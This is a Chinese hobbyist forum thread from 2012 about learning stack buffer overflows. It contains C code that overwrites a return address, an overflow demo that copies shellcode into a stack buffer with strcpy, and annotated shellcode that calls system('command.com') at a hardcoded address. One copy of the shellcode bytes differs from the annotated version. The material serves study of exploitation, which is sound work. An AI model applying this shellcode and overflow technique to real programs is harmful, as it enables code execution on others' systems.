编程小菜鸟 对这 32 64 一点都不了解
我是从80X86  16位汇编走出来的

你给的汇编很好，很感谢
我要回去睡觉了，忙了一晚上 就为了 怎么 变成一个汇编格式
我的vm 虚拟机的 客户端ubtun 还没下好，什么破网吧么

仁兄  我想醒了，就对这个问题明亮了，你要帮忙啊

#include<stdio.h>
void focg(){
    int a[10];
    int *ret;
    ret=a+11;
    *ret+=8;
}

int main()
{    int b=10000;
     printf("i lov you %d \n",b);
    focg();
     printf("i lov you %d \n",b);
    b=1;
    b*=9;
    b+=b;
    printf("i lov you %d \n",b);
}

你运行下这个程序 是可以实现程序跳转的

明天 我发一段比较简单的利用缓冲区溢出漏洞的C语言代码   大家研究下    从容易上手的开始

好的 我要把那个机器代码用汇编检测下到底是不是正确的
然后再跟你说声

#include <string.h>
#include "stdio.h"
char shellcode[] = 
{
0x8B,0xE5, 0x55,0x8B,0xEC,0x83,0xEC,0x0C,0xB8,
0x63,0x6F,0x6D,0x6D,0x6D,0x6D,0x6F,0x63,0x89,
0x45,0xF4,0xB8,0x61,0x6E,0x64,0x2E,0x89,0x45,
0xF8,0xB8,0x63,0x6F,0x6D,0x22,0x89,0x45,0xFC,
0x33,0xD2, 0x88,0x55,0xFF, 0x8D,0x45,0xF4, 
0x50, 0xB8,0x24,0x98,0x01,0x78, 0xFF,0xD0 
}; 
char large_string[128];

void main(){
004113C0  push        ebp  
004113C1  mov         ebp,esp 
004113C3  sub         esp,144h 
004113C9  push        ebx  
004113CA  push        esi  
004113CB  push        edi  
004113CC  lea         edi,[ebp-144h] 
004113D2  mov         ecx,51h 
004113D7  mov         eax,0CCCCCCCCh 
004113DC  rep stos    dword ptr es:[edi] 
004113DE  mov         eax,dword ptr [___security_cookie (417040h)] 
004113E3  xor         eax,ebp 
004113E5  mov         dword ptr [ebp-4],eax 
    char buffer[96];
    int i;
    int *larg_ptr=large_string;      //将char字符数组的首地址赋值给一个int 类型的指针，进行int 格式的引用，针对内存的读取方式改变
004113E8  mov         dword ptr [ebp-80h],offset _large_string (4175C0h) 
    for(i=0;i<32;i++)                 
004113EF  mov         dword ptr [ebp-74h],0 
004113F6  jmp         main+41h (411401h) 
004113F8  mov         eax,dword ptr [ebp-74h] 
004113FB  add         eax,1 
004113FE  mov         dword ptr [ebp-74h],eax 
00411401  cmp         dword ptr [ebp-74h],20h 
00411405  jge         main+55h (411415h) 
        *(larg_ptr+i)=buffer;    // 将32位buffer的地址放入large_string 的整个数据块中
00411407  mov         eax,dword ptr [ebp-74h] 
0041140A  mov         ecx,dword ptr [ebp-80h] 
0041140D  lea         edx,[ebp-68h] 
00411410  mov         dword ptr [ecx+eax*4],edx 
00411413  jmp         main+38h (4113F8h) 
    for(i=0;i<strlen(shellcode);i++)
00411415  mov         dword ptr [ebp-74h],0 
0041141C  jmp         main+67h (411427h) 
0041141E  mov         eax,dword ptr [ebp-74h] 
00411421  add         eax,1 
00411424  mov         dword ptr [ebp-74h],eax 
00411427  push        offset _shellcode (417000h) 
0041142C  call        @ILT+160(_strlen) (4110A5h) 
00411431  add         esp,4 
00411434  cmp         dword ptr [ebp-74h],eax 
00411437  jae         main+8Dh (41144Dh) 
        large_string[i]=shellcode[i];   //将shellcode的内容按照字节方式放进large_string中
00411439  mov         eax,dword ptr [ebp-74h] 
0041143C  mov         ecx,dword ptr [ebp-74h] 
0041143F  mov         dl,byte ptr _shellcode (417000h)[ecx] 
00411445  mov         byte ptr _large_string (4175C0h)[eax],dl 
0041144B  jmp         main+5Eh (41141Eh) 
    strcpy(buffer,large_string);        //字符的copy 将larg_string 数据块复制到buffer所指向的数据块中，按字符方式进行
0041144D  push        offset _large_string (4175C0h) 
00411452  lea         eax,[ebp-68h] 
00411455  push        eax  
00411456  call        @ILT+165(_strcpy) (4110AAh) 
0041145B  add         esp,8 
    for(i=0;i<24;i++)
0041145E  mov         dword ptr [ebp-74h],0 
00411465  jmp         main+0B0h (411470h) 
00411467  mov         eax,dword ptr [ebp-74h] 
0041146A  add         eax,1 
0041146D  mov         dword ptr [ebp-74h],eax 
00411470  cmp         dword ptr [ebp-74h],18h 
00411474  jge         main+0D7h (411497h) 
        printf("%d\n",((int*)buffer)[i]);      //这里是强制类型转换输出结果，意思是将char型指针内型强制转换成int型进行内存操作
00411476  mov         esi,esp 
00411478  mov         eax,dword ptr [ebp-74h] 
0041147B  mov         ecx,dword ptr [ebp+eax*4-68h] 
0041147F  push        ecx  
00411480  push        offset string "%d\n" (41573Ch) 
00411485  call        dword ptr [__imp__printf (4182CCh)] 
0041148B  add         esp,8 
0041148E  cmp         esi,esp 
00411490  call        @ILT+320(__RTC_CheckEsp) (411145h) 
00411495  jmp         main+0A7h (411467h) 
        printf("%d\n",buffer);
00411497  mov         esi,esp 
00411499  lea         eax,[ebp-68h] 
0041149C  push        eax  
0041149D  push        offset string "%d\n" (41573Ch) 
004114A2  call        dword ptr [__imp__printf (4182CCh)] 
004114A8  add         esp,8 
004114AB  cmp         esi,esp 
004114AD  call        @ILT+320(__RTC_CheckEsp) (411145h) 
}
004114B2  xor         eax,eax 
004114B4  push        edx  
004114B5  mov         ecx,ebp 
004114B7  push        eax  
004114B8  lea         edx,[ (4114E4h)] 
004114BE  call        @ILT+130(@_RTC_CheckStackVars@8) (411087h) 
004114C3  pop         eax  
004114C4  pop         edx  
004114C5  pop         edi  
004114C6  pop         esi  
004114C7  pop         ebx  
004114C8  mov         ecx,dword ptr [ebp-4] 
004114CB  xor         ecx,ebp 
004114CD  call        @ILT+25(@__security_check_cookie@4) (41101Eh) 
004114D2  add         esp,144h 
004114D8  cmp         ebp,esp 
004114DA  call        @ILT+320(__RTC_CheckEsp) (411145h) 
004114DF  mov         esp,ebp 
004114E1  pop         ebp  
004114E2  ret              
004114E3  nop              
004114E4  db          01h  
004114E5  db          00h  
004114E6  db          00h  
004114E7  db          00h  
004114E8  db          ech  
004114E9  db          14h  
004114EA  db          41h  
004114EB  db          00h  
004114EC  db          98h  
004114ED  db          ffh  
004114EE  db          ffh  
004114EF  db          ffh  
004114F0  db          60h  
004114F1  db          00h  
004114F2  db          00h  
004114F3  db          00h  
004114F4  db          f8h  
004114F5  db          14h  
004114F6  db          41h  
004114F7  db          00h  
004114F8  db          62h  
004114F9  db          75h  
004114FA  db          66h  
004114FB  db          66h  
004114FC  db          65h  
004114FD  db          72h  
004114FE  db          00h  

这是建立windows项目调试 时输出的结果

char shellcode[] = {
　　0x8B,0xE5, /*mov esp, ebp */
　　0x55, /*push ebp */
　　0x8B,0xEC, /*mov ebp, esp */
　　0x83,0xEC,0x0C, /*sub esp, 0000000C */
　　0xB8,0x63,0x6F,0x6D,0x6D, /*mov eax, 6D6D6F63 */
　　0x89,0x45,0xF4, /*mov dword ptr [ebp-0C], eax*/
　　0xB8,0x61,0x6E,0x64,0x2E, /*mov eax, 2E646E61 */
　　0x89,0x45,0xF8, /*mov dword ptr [ebp-08], eax*/
　　0xB8,0x63,0x6F,0x6D,0x22, /*mov eax, 226D6F63 */
　　0x89,0x45,0xFC, /*mov dword ptr [ebp-04], eax*/
　　0x33,0xD2, /*xor edx, edx */
　　0x88,0x55,0xFF, /*mov byte ptr [ebp-01], dl */
　　0x8D,0x45,0xF4, /*lea eax, dword ptr [ebp-0C]*/
　　0x50, /*push eax */
　　0xB8,0x24,0x98,0x01,0x78, /*mov eax, 78019824 */
　　0xFF,0xD0 /*call eax */
　　};

date segment
mm db 08Bh,0E5h,055h,08Bh,0ECh,083h,0ECh,0Ch,0B8h
   db 063h,06Fh,06Dh,06Dh,06Dh,06Dh,06Fh,063h,089h
   db 045h,0F4h,0B8h,061h,06Eh,064h,02Eh,089h,045h
   db 0F8h,0B8h,063h,06Fh,06Dh,022h,089h,045h,0FCh
   db 033h,0D2h,088h,055h,0FFh,08Dh,045h,0F4h
   db 050h,0B8h,024h,098h,01h,078h,0FFh,0D0h
xx dw 2 dup(?)
date ends
code segment
     assume cs:code,ds:date
start:  mov ax,date
       mov ds,ax
       mov cx,length mm
       mov si,offset mm
       mov ax,0000h
       mov es,ax
       mov di,0200h
       cld
       rep movsb
       mov bx,offset xx
       mov word ptr [bx],0200h
       mov word ptr [bx+2],0
       jmp dword ptr [bx]
      
       mov ah,4ch
       int 21h
code ends
   end start
这个汇编出来的程序报错  说什么无效指令  调试个汇编程序真要命，我范了两个错误，1.使用了汇编保留字做了段名  2 jmp指令格式 直接jmp 0000h:0200h了 搞了半天
我要抓狂了
32的汇编 懂是懂 可是书上是结合保护模式和实模式的方式写的
难道要我从实模式切换到保护模式运行 转移到内存中的机器码？
这个 32的汇编机器码  能不能在16位DOS程序里运行哟

[ 本帖最后由 zhu224039 于 2012-11-21 11:12 编辑 ]

晚上再过来贴32位的汇编代码